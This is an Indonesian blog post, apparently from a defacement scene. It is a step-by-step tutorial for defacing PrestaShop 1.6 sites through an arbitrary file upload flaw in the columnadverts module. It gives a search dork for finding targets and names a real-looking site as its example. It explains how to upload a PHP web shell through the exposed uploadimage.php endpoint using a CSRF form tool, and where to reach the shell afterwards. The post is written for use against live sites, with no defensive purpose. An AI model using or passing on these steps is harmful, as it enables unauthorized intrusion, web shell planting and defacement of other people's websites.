Home Deface Deface Metode Pretashop 1.6 Arbitary File Upload

Kamis, 21 Desember 2017

Deface Metode Pretashop 1.6 Arbitary File Upload

Deface Metode Pretashop 1.6 arbitary file upload





Dork : powered by iqit-commerce.com (kembangin y tot)

Exploit : /modules/columnadverts/uploadimage.php

CSRF : GENJOEDz

1 . Dorking Dengan Dork Diatas

2 . Pilih Target Yang Vuln (Ciri Ciri Web Vuln Blank Atau error)



3 . Copy Url Tersebut 
     Contoh : http://www.toberas.es//modules/columnadverts/uploadimage.php

4 . Pastekan Ke CSRF
     Pilih " userfile " di kolom post file



5 . Lock !! Dan Upload Shell Kalian Dengan ext .php

Untuk Akses >www.site.com//modules/columnadverts/slides/shellmu.php



6 . Clear 1!1!1




Share this

Recommended

Disqus Comments